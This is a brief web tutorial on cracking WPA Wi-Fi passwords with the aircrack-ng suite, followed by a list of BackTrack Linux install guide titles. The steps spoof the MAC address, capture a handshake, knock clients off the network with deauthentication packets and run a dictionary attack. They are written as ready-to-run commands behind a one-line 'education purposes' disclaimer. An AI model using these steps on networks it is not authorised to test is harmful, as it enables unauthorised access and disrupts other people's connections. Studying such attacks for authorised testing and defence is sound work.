This is an easy to follow tutorial on how to crack a WPA encrypted password. This information should only be used for education purposes.
Steps:
- airmon-ng stop wlan0
- ifconfig wlan0 down
- macchanger –mac 00:11:22:33:44:55 wlan0
- airmon-ng start wlan0
- airodump-ng wlan0
- airodump-ng -c (channel) -w (file name) –bssid (bssid) wlan0
- aireplay-ng -0 5 -a (bssid)wlan0
- aircrack-ng (filename-01.cap)-w (dictionary location)
- BackTrack 4 Beta Hard Disk Install
- HowTo: Crack WEP with BackTrack 3
- How To Install Backtrack4 Using Grub On Ubuntu
- How to install BT4 dualboot xp on your HDD without vmware or dvd disks
- Backtrack 4 – USB/Nessus Boot with Persistent Changes
- How to make Backtrack 4 boot from USB
- Installing Backtrack 3 to a harddrive
- HowTo: Backtrack 4 (Pre Release) Hard Drive Installation
- Installing Backtrack 3 to a harddrive
- BT4 Install: Simplest way to install BackTrack4